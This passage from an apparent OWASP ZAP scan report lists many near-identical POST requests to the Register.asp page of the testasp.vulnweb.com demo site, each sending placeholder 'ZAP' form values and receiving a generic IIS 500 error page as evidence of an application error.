tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
